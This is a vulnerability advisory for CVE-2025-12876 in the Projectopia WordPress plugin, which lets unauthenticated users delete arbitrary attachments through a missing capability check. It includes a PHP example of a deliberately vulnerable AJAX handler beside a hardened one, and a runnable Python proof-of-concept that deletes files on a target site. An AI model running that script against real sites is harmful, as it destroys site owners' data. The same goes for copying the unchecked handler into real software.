Security Vulnerability Report
CVE-2025-12876 CVSS 5.3 MEDIUM

CVE-2025-12876

Published: 2025-12-05 10:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Projectopia – WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pto_delete_file AJAX action in all versions up to, and including, 5.1.19. This makes it possible for unauthenticated attackers to delete arbitrary attachments.
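
The weakness class here is CWE-862 (missing authorization): an admin-ajax.php handler that performs a privileged operation without asking WordPress whether the caller is allowed to perform it. The snippet below is an added illustration of that defect and of the remediation pattern in a generic plugin; it is not Projectopia's code and does not reproduce the referenced changeset. Every hook name, action name, script handle and nonce action in it (`example_delete_file`, `example_delete_file_nonce`, `example-admin`) is hypothetical. The hardened handler combines three things: it is registered for logged-in requests only, it verifies a nonce, and it checks the `delete_post` meta capability against the specific attachment before deleting anything.

```php
<?php
// Added illustrative example (not Projectopia's own code): the pattern that
// closes a CWE-862 "missing authorization" hole on a WordPress AJAX action.
// All hook, action and nonce names below are hypothetical.

// Vulnerable shape: the handler is reachable by anonymous requests
// (wp_ajax_nopriv_*) and deletes whatever attachment ID it is handed.
add_action( 'wp_ajax_example_delete_file', 'example_delete_file_unchecked' );
add_action( 'wp_ajax_nopriv_example_delete_file', 'example_delete_file_unchecked' );

function example_delete_file_unchecked() {
    $file_id = isset( $_POST['file_id'] ) ? absint( $_POST['file_id'] ) : 0;
    wp_delete_attachment( $file_id, true ); // no authorization, no nonce
    wp_send_json_success();
}

// Hardened shape: logged-in hook only, nonce check, and a capability check
// against the specific attachment before anything is deleted.
add_action( 'wp_ajax_example_delete_file', 'example_delete_file_checked' );

function example_delete_file_checked() {
    // Stops the request with -1 / HTTP 403 when the 'security' nonce is
    // missing or invalid. This is CSRF protection, not authorization.
    check_ajax_referer( 'example_delete_file_nonce', 'security' );

    $file_id = isset( $_POST['file_id'] ) ? absint( $_POST['file_id'] ) : 0;
    if ( ! $file_id || 'attachment' !== get_post_type( $file_id ) ) {
        wp_send_json_error( 'invalid file id', 400 );
    }

    // 'delete_post' is the meta capability WordPress resolves per post,
    // so an author cannot delete another user's attachment. This is the
    // kind of check the advisory describes as missing.
    if ( ! current_user_can( 'delete_post', $file_id ) ) {
        wp_send_json_error( 'not allowed', 403 );
    }

    if ( ! wp_delete_attachment( $file_id, true ) ) {
        wp_send_json_error( 'delete failed', 500 );
    }
    wp_send_json_success( array( 'deleted' => $file_id ) );
}

// The nonce the hardened handler expects is handed to the page's own
// script so the browser can send it back in the 'security' field.
function example_localize_delete_nonce() {
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_delete_file_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_localize_delete_nonce' );
```

The two checks are not interchangeable. A nonce only proves the request originated from a page the site served to this browser; without `current_user_can()` a low-privilege account with a valid nonce could still delete other users' files. Conversely, a capability check alone leaves the handler open to cross-site request forgery against a logged-in privileged user. Dropping the `wp_ajax_nopriv_*` registration is what removes the unauthenticated path the advisory describes.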

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Projectopia Core plugin, all versions up to and including 5.1.19 (fixed in 5.1.20)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12876 PoC - Unauthenticated File Deletion
# Target: Projectopia WordPress Plugin < 5.1.20
# Action: pto_delete_file AJAX endpoint


def delete_file(target_url, file_id):
    """
    Delete arbitrary file via unprotected AJAX action

    Args:
        target_url: WordPress site URL
        file_id: Attachment ID to delete
    """
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    data = {
        'action': 'pto_delete_file',
        'file_id': file_id,
        'security': ''  # No nonce validation
    }

    try:
        response = requests.post(endpoint, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent for file_id: {file_id}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <file_id>")
        print(f"Example: python {sys.argv[0]} http://example.com 123")
        sys.exit(1)

    target = sys.argv[1]
    file_id = sys.argv[2]
    delete_file(target, file_id)

References

https://plugins.trac.wordpress.org/browser/projectopia-core/trunk/includes/functions/general/general_functions.php#L389
https://plugins.trac.wordpress.org/changeset/3417635/projectopia-core/trunk/includes/functions/general/general_functions.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/940c6a27-05a2-4eca-89ee-b483f88b9524?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12876", "sourceIdentifier": "[email protected]", "published": "2025-12-05T10:15:46.370", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Projectopia – WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pto_delete_file AJAX action in all versions up to, and including, 5.1.19. This makes it possible for unauthenticated attackers to delete arbitrary attachments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/projectopia-core/trunk/includes/functions/general/general_functions.php#L389", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3417635/projectopia-core/trunk/includes/functions/general/general_functions.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/940c6a27-05a2-4eca-89ee-b483f88b9524?source=cve", "source": "[email protected]"}]}}